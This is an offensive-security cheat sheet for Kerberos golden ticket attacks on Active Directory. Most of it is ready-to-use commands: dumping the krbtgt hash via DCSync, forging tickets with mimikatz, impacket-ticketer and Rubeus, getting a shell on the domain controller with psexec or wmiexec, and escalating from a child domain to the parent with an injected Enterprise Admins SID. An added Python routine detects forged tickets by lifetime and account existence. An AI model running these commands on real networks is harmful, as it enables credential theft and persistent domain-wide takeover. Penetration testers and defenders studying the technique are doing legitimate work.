Overview
A golden ticket is a forged TGT encrypted with the krbtgt account's hash; because the KDC trusts any TGT it can decrypt, the ticket grants access to any service in the domain. Requires: the krbtgt NTLM hash, the domain SID and the domain name.
Get krbtgt Hash
DCSync
impacket-secretsdump DOMAIN/admin:password@DC_IP -just-dc-user krbtgt
Mimikatz
mimikatz # lsadump::dcsync /domain:domain.local /user:krbtgt
Get Domain SID
impacket-lookupsid DOMAIN/user:password@DC_IP
Get-ADDomain | Select DomainSID
whoami /user # strip the last RID from the user SID to get the domain SID
Forge — Mimikatz
mimikatz # kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /krbtgt:NTLM_HASH /ptt
Save to File
mimikatz # kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /krbtgt:NTLM_HASH /ticket:golden.kirbi
Forge — Impacket
impacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-DOMAIN-SID -domain domain.local Administrator
Use
export KRB5CCNAME=Administrator.ccache
impacket-psexec domain.local/Administrator@DC -k -no-pass
impacket-wmiexec domain.local/Administrator@DC -k -no-pass
Forge — Rubeus
.\Rubeus.exe golden /rc4:KRBTGT_HASH /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /ptt
Inject & Use
mimikatz # kerberos::ptt golden.kirbi
klist
dir \\DC\C$
psexec.exe \\DC cmd.exe
Inter-Realm (Cross-Domain)
mimikatz # kerberos::golden /user:Administrator /domain:child.domain.local /sid:CHILD_SID /krbtgt:CHILD_KRBTGT /sids:S-1-5-21-PARENT-SID-519 /ptt
Add Enterprise Admins SID (-519) from parent domain.
Notes
- Golden ticket valid for 10 years by default
- Works even if user doesn’t exist
- Survives password resets (until krbtgt rotated twice)
- Detection: TGT lifetime far beyond the domain ticket policy, or a ticket for an account that does not exist in AD
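A small triage routine for the two detection points above, added here as an example and not part of the original cheat sheet. It runs over constructed ticket-metadata records (the field names are an assumption, not any product's schema) and flags tickets whose lifetime exceeds the AD default MaxTicketAge of 10 hours or whose account is absent from a directory snapshot.

```python
from datetime import datetime, timedelta

# AD default maximum TGT lifetime; a forged ticket with mimikatz defaults lasts 10 years.
MAX_TGT_LIFETIME = timedelta(hours=10)

# Constructed snapshot of accounts that exist in the directory (lower-cased).
KNOWN_ACCOUNTS = {"administrator", "jdoe", "svc_backup"}

# Constructed ticket records, e.g. exported from a SIEM or endpoint agent.
# Field names "account", "start" and "end" are an assumption for this example.
SAMPLE_TICKETS = [
    {"account": "jdoe", "start": "2024-03-01T08:00:00", "end": "2024-03-01T18:00:00"},
    {"account": "Administrator", "start": "2024-03-01T09:00:00", "end": "2034-02-27T09:00:00"},
    {"account": "ghost", "start": "2024-03-01T09:05:00", "end": "2024-03-01T19:05:00"},
]


def parse(ts):
    """Parse an ISO-8601 timestamp string into a datetime."""
    return datetime.fromisoformat(ts)


def check_ticket(ticket, known=KNOWN_ACCOUNTS, max_life=MAX_TGT_LIFETIME):
    """Return a list of reasons this ticket looks forged; empty list means clean."""
    findings = []
    lifetime = parse(ticket["end"]) - parse(ticket["start"])
    if lifetime > max_life:
        findings.append(f"lifetime {lifetime} exceeds policy {max_life}")
    if ticket["account"].lower() not in known:
        findings.append("account not present in directory")
    return findings


def triage(tickets, **kw):
    """Map each suspicious account name to its findings; clean tickets are omitted."""
    return {t["account"]: f for t in tickets if (f := check_ticket(t, **kw))}


if __name__ == "__main__":
    for acct, reasons in triage(SAMPLE_TICKETS).items():
        print(acct, "->", "; ".join(reasons))
```

A ticket that passes both checks can still be forged, so treat this as a first-pass filter and correlate with TGS requests that have no preceding TGT request on any DC.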
Quick Reference
| Task | Command |
|---|---|
| Get krbtgt | secretsdump -just-dc-user krbtgt |
| Forge (Mimikatz) | kerberos::golden /user:Admin /krbtgt:HASH /ptt |
| Forge (Impacket) | impacket-ticketer -nthash HASH -domain-sid SID |
| Use | export KRB5CCNAME=Admin.ccache → -k -no-pass |